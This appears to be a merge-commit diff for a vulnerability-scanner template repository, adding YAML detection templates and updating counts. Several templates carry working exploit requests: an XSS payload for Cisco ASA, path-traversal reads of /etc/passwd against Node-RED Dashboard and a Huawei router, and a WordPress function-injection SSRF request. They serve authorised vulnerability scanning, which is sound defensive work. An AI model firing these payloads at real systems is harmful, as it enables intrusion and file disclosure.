Merge pull request #64 from projectdiscovery/master

Updation

README.md

@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
 
 | Templates        | Counts                         | Templates       | Counts                          | Templates      | Counts                       |
 | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves             | 363           | vulnerabilities | 198 | exposed-panels | 158 |
+| cves             | 365           | vulnerabilities | 200 | exposed-panels | 160 |
 | takeovers        | 68        | exposures       | 106       | technologies   | 107   |
 | misconfiguration | 71 | workflows       | 32         | miscellaneous  | 26  |
 | default-logins   | 32 | file            | 42            | dns            | 10            |
 | fuzzing          | 10          | helpers         | 9         | iot            | 13            |
 
-**120 directories, 1355 files**.
+**120 directories, 1365 files**.
 
 </td>
 </tr>

cves/2020/CVE-2020-3580.yaml

@@ -0,0 +1,38 @@
+id: CVE-2020-3580
+
+info:
+  name: Cisco ASA XSS
+  author: pikpikcu
+  severity: medium
+  reference: |
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-3580
+    - https://twitter.com/ptswarm/status/1408050644460650502
+  description: |
+    Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.
+  tags: cve,cve2020,xss,cisco
+
+requests:
+  - raw:
+      - |
+        POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 44
+
+        SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<svg/onload=alert(/{{randstr}}/)>'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"

cves/2021/CVE-2021-3223.yaml

@@ -0,0 +1,21 @@
+id: CVE-2021-3223
+
+info:
+  name: Node RED Dashboard - Directory Traversal
+  author: gy741
+  severity: high
+  description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
+  reference: |
+    - https://github.com/node-red/node-red-dashboard/issues/669
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
+  tags: cve,cve2020,node-red-dashboard,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"

exposed-panels/avtech-dvr-exposure.yaml

@@ -0,0 +1,26 @@
+id: avtech-dvr-exposure
+
+info:
+  name: Avtech AVC798HA DVR Information Exposure
+  description: Under the /cgi-bin/nobody folder every CGI script can be accessed without authentication.
+  reference: http://www.avtech.com.tw/
+  author: geeknik
+  severity: low
+  tags: dvr,exposure,avtech
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/nobody/Machine.cgi?action=get_capability"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Firmware.Version="
+          - "MACAddress="
+          - "Product.Type="
+        condition: and

exposed-panels/jenkins-api-panel.yaml

@@ -0,0 +1,23 @@
+id: jenkins-api-panel
+
+info:
+  name: Jenkins API Instance Detection Template
+  author: righettod
+  severity: info
+  description: Try to detect the presence of a Jenkins API instance via the API default XML endpoint
+  tags: panel,api,jenkins
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/xml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "hudson.model.Hudson"
+
+      - type: status
+        status:
+          - 200

network/smb-v1-detection.yaml

@@ -0,0 +1,22 @@
+id: smb-v1-detection
+
+info:
+  name: SMB-V1 Detection
+  author: pussycat0x
+  severity: low
+  tags: network,windows,smb,service
+  reference: https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/
+
+network:
+  - inputs:
+      - data: 00000031ff534d4272000000001845680000000000000000000000000000be2200000100000e00024e54204c4d20302e3132000200
+        type: hex
+
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:445"
+
+    matchers:
+      - type: word
+        words:
+          - "SMBr"

network/smtp-detection.yaml

@@ -0,0 +1,18 @@
+id: smtp-service-detection
+
+info:
+  name: SMTP Service Detection
+  author: pussycat0x
+  severity: info
+  tags: network,service,smtp
+
+network:
+  - inputs:
+      - data: "\r\n"
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:25"
+    matchers:
+      - type: word
+        words:
+          - "SMTP"

network/vsftpd-detection.yaml

@@ -0,0 +1,21 @@
+id: vsftpd-detection
+
+info:
+  name: VSFTPD v2.3.4 Backdoor Command Execution
+  author: pussycat0x
+  severity: critical
+  tags: network,vsftpd,ftp
+  reference: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
+
+network:
+  - inputs:
+      - data: "USER anonymous\r\nPASS pussycat0x\r\n"
+
+    host:
+      - "{{Hostname}}"
+      - "{{Hostname}}:21"
+
+    matchers:
+      - type: word
+        words:
+          - "vsFTPd 2.3.4"

vulnerabilities/other/huawei-hg659-lfi.yaml

@@ -0,0 +1,26 @@
+id: huawei-hg659-lfi
+
+info:
+  name: HUAWEI HG659 LFI
+  author: pikpikcu
+  severity: high
+  reference: |
+    - https://twitter.com/sec715/status/1406782172443287559
+  tags: lfi,huawei
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        condition: and
+
+      - type: status
+        status:
+          - 200

vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml

@@ -0,0 +1,32 @@
+id: wp-multiple-theme-ssrf
+
+info:
+  name: WordPress Multiple Themes - Unauthenticated Function Injection
+  author: madrobot
+  severity: high
+  tags: wordpress,rce,ssrf
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: en
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Content-Length: 158
+        Connection: close
+
+        action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Example Domain"
+          - "protocol_version"
+        part: body
+
+      - type: status
+        status:
+          - 200